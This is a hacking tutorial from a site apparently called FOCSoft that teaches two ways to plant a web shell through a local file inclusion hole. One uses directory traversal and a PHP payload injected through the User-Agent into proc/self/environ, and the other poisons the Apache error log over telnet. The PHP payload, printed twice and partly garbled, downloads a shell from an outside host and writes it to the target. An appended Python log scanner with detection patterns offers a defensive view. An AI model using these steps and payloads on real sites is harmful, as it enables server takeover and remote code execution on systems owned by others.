
How To Upload Shell Via LFI Vulnerability - FOCSoft


 

Assalam O Alikum Friends,
Today I am going to teach you two ways of uploading a shell via an LFI vulnerability.
Requirement: a website vulnerable to LFI.
Method 1:
NOTE: You will need Firefox and its add-on Tamper Data to do this method! :)

LFI, or Local File Inclusion, allows you to include a local file (which means that the file is stored on the server) and run it in a web script.
In this method we are going to upload a shell by accessing proc/self/environ.
Now we have our page:
http://www.target.com/index.php?include=register.php
And now we are going to do this:
http://www.target.com/index.php?include=../
If it gives you an error message, this is good. The best thing that can happen is that it says "No such file or directory".
But anyway, now add this to your URL:
http://www.target.com/index.php?include=../etc/passwd

And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd

And so on. Now let's say we got to this URL:
http://www.target.com/index.php?include=.../passwd

And we see some huge shitty text we cannot handle. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?include=...environ

If you see some text, you did good; if you see an error message, you did bad. Now this is the point where we use Tamper Data. Start Tamper Data and reload the page, and for the user agent you type in the following PHP script:

PHP Code:-

("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>

This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put a web script in it, the include will execute it.
Now simply access your shell by going to
http://www.target.com/shell.php
And rape the server.
Now LFI method 2:
NOTE: This only works on Apache servers!
Alright, you get back to the point where we tried to access etc/passwd. You will do the same method, but not with etc/passwd; you will try to get access to apache/logs/error.log.
If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).
Now when you have found the file, open up cmd and type in
Code:
telnet www.target.com 80
When you are inside the telnet session, you copy the following code (you use your own shell URL):
PHP Code:

("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
Paste it into the telnet window, and press enter once or maybe twice (until you get an error message).
Now refresh the page in the browser (error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server.
Access it by typing the following into your browser:
http://www.target.com/shell.php
ENJOY...
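
From the defender's side, both methods leave recognisable traces in the web server's logs: "../" sequences in the include parameter reaching for etc/passwd, proc/self/environ or the Apache logs, and PHP tags inside a logged field. The scanner below is an added example, not part of the original post; it assumes the Apache "combined" log format, and the sample lines (addresses, timestamps, marker payload) are constructed.

```python
import re
from urllib.parse import unquote

# One quoted log field; Apache writes embedded quotes as \" so allow escapes.
Q = r'"((?:[^"\\]|\\.)*)"'
# Assumption: combined format: host ident user [time] "request" status bytes "referer" "agent"
LINE = re.compile(rf'^(\S+) \S+ \S+ \[[^\]]+\] {Q} (\d{{3}}) \S+ {Q} {Q}$')
TRAVERSAL = re.compile(r'\.\.[/\\]')
SENSITIVE = re.compile(r'etc/passwd|proc/self/environ|logs/(?:error|access)[._]log', re.I)
PHP_TAG = re.compile(r'<\?(?:php|=)', re.I)

# Constructed sample lines (documentation addresses, harmless marker instead of a payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?include=register.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:13:56:11 +0000] "GET /index.php?include=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?include=../../../proc/self/environ HTTP/1.1" 200 912 "-" "<?php /* constructed marker */ ?>"',
    '192.0.2.44 - - [10/Oct/2023:13:58:40 +0000] "<?php /* constructed marker */ ?>" 400 226 "-" "-"',
]

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252F) is still seen."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def findings(line):
    """Return the list of indicators present in one log line."""
    m = LINE.match(line.strip())
    if not m:
        return ["unparsed"]
    request, _status, referer, agent = m.groups()[1:]
    target = decode(request)
    out = []
    if TRAVERSAL.search(target):
        out.append("traversal")
    if SENSITIVE.search(target):
        out.append("sensitive-file")
    # PHP in a field that ends up in environ or a log file is the poisoning step.
    if any(PHP_TAG.search(decode(f)) for f in (request, referer, agent)):
        out.append("php-in-logged-field")
    return out

def scan(lines):
    # (line number, indicators) for every line with at least one indicator
    return [(i, f) for i, line in enumerate(lines, 1) if (f := findings(line))]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(lineno, ", ".join(hits))
```

A 200 response on a line flagged "sensitive-file" means the include actually returned the file, which is the point at which the include parameter needs to be restricted to a fixed allowlist of page names.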
